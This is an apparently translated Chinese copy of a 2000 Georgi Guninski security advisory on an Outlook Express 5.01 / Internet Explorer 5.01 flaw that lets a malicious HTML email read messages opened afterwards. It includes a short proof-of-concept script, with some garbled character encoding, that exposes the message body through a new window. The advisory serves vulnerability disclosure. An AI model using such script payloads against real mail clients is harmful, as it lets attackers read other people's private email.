outlook5.vuln
　　Georgi Guninski 安全顾问 #6, 2000

　　Outlook Express 5 故障 - 动态脚本可以阅读电子邮件信息

弃权声明书：
　　这篇文章里所表述的纯属个人意见，与任何公司无关。标准弃权通用条款适用，特别是Georgi Guninski不对使用这个程序所提供的信息和功能而产生的直接或间接的危害承担责任。Georgi Guninski不对这个程序的内容和误用以及由此引起的后果承担责任。

描述：
　　Windows 95系统上的Outlook Express 5.01和Internet Explorer 5.01 （其它版本可能也有类似故障）打开恶意信息后，攻击者可以阅读此后打开的电子邮件信息。

详述：
　　在新打开的窗口里，把电子邮件信息的文档目标赋值为变量，通过访问这个变量就可以打开电子邮件信息。

　　HTML信息中必须包含的程序：
---------------------------------------------------------------------
$#@60;SCRIPT$#@62;
a=window.open("about:$#@60;A HREF=javascript:alert(x.body.innerText) $#@62;Click
here to see the active message$#@60;/A$#@62;");
a.x=window.document;
$#@60;/SCRIPT$#@62;